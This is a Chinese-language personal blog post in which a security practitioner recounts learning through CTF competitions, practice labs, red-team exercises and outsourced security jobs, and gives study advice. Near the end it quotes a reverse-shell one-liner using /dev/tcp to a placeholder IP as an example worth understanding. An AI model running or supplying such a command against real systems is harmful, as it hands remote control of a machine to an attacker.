type
status
date
slug
summary
tags
category
icon
password
新手学习,举步维艰
这是一篇杂谈,愿看见这篇文章的人终成大牛
回顾
刚过完春节,现在又回到了工位上了,回看2024,发生了很多事,2024经历了很多分别和相遇,相见时难别亦难,工作也不是很顺心,一直到年底才稳定了下来,甚至中途都有点想放弃网安转行去做其他事情。
对于网安,真是又爱又恨,刚开始接触网安的时候是在学校备战打比赛的时候,在网上找学习资料偶遇一个‘黑客’,于是我开始入坑了
从湖北信创大赛开始,初赛的CTF勾起了我对这行的兴趣,于是在备赛期间通过BUUCTF、攻防世界、CTFshow等平台开始学习,但还是学的云里雾里,好在最后还是过了初赛。但随之而来的是噩耗,决赛比的是AWD,作为刚入门的小白,根本不知道AWD怎么弄,甚至当时网上有源码的靶场都几乎没有,于是毫无悬念的在比赛拿的最后几名
在AWD时,我以为和CTF差不多,但事实给了我当头一榔棰,看着这几题web,甚至不知道从何处下手,在回去后,我开始恶补SQL、web、Linux等基础,但由于当时情况特殊,22年左右网上的教学教程也是少之又少
于是只能打打靶场,DVWA,PIKACHU,sql-labs等基础靶场,用用kali进行梭哈,先干SQL注入,再干文件上传,纯纯当一个脚本小子,把别人的脚步运行起来就叫别人大佬(虽然确实是大佬),给个jar不知道是啥,main.py看不懂
后来也算运气好点,碰上市护网了,学校有学习名额,于是我去了,碰上网安协会请知名CTF战队来讲了一点东西,在他们的点拨下,于是我看上了小迪(O(∩_∩)O哈哈~),慢慢的就开始学起来了
到临近毕业,也是学的小有所成,实习干上了安服,毕业了也刚好赶上护网(那时苕皮哥还没出来),蹭了点hvv经历,然后就是大学生就业困难的,真的要哭死了
到某年底,碰上了某银行招外包,简历过了准备去线下面试,特地的复习了等保、各类服务、渗透的知识。然后!!!!问了我 一堆应急响应的东西!!!!当时面完我人都是麻的,在做安服的时候只处理过挖矿,hvv也只是多了些webshell,问我整个处理流程和思路,人都是麻的
到了24年,在做安全运维,因为一些原因,我还是留在了武汉,BUT,又因为有些原因,那些原因就不能支撑着我留在武汉了,于是开始了浪子生活,后面面了几家,还是外包到某国企搞安全运营了,现在网上学习资料多,课程也多了(有好有坏、注意甄别)
总结
搞IT就是要持之以恒的学习,你可以中途累了休息休息,但不要忘了持续学习,要自己多查资料以及用工具解决多环境问题,如果没有这个心思,我真诚的建议转行,IT这块难再发展了。除了善用搜索引擎以外,我们还需要一点更强的资料查找能力,微信公众号、github、推特、youtube也要利用起来,很多时候你需要的东西不是一定要付费,或者不需要付那么多费,不要被简单的东西割韭菜
一定要会一点编程,不需要你会非常深的操作,不用去考虑高性能、死锁等等问题,一门编程语言,基本上只需要学15天,当能够像搭积木一样做出一个傻瓜式的程序,能够初步代替手工的时候,对学安全来讲就足够了,深入那是之后的事情,不是现阶段的目标,当完成这15天的学习,再转过头去看之前认为的所谓大佬写的东西,会发现其实他们也只是在傻乎乎的搭积木,在如今AI的能力加持下,自己从零基础到和他们一样写工具,已经完全不需要有人教或者报培训班。不要过于追求现成,求原理然后转化为自己的知识储备,这是一个思维,注意不单单只是用工具,在安全技术这一块,凡事亲力亲为,知道原理才是进步,自己会是自己的,别人会拿给你用,那是别人的,你没有而别人有,之间的差距就会在工资上体现出来。
追根溯源,是一个非常值得拥有的能力,无论是你学习技术,还是找资料,一定要保持追根溯源的好习惯,举个例子,技术向,只知道打了一个payload可以造成rce是不够的,要知道为什么,payload进入目标程序后是如何执行的,甚至深入到进入到底层linux后它是怎么运行的,经典的反弹shell,一句简单的命令:sh -i >& /dev/tcp/xxx.xxx.xx.xx/9001 0>&1 当你去观察它是如何运作的时候,你就能感受到追求原理的魅力
你可以找同伴,找朋友,找志同道合的人,但切记不要找师父,没有人会平白无故带你,唯有互相交流,共同努力,互惠互利才是王道
- Author:Pass`Miao
- URL:whypass.top/article/19680a1f-83f0-8004-b65d-f3241fc3dfd9
- Copyright:All articles in this blog, except for special statements, adopt BY-NC-SA agreement. Please indicate the source!
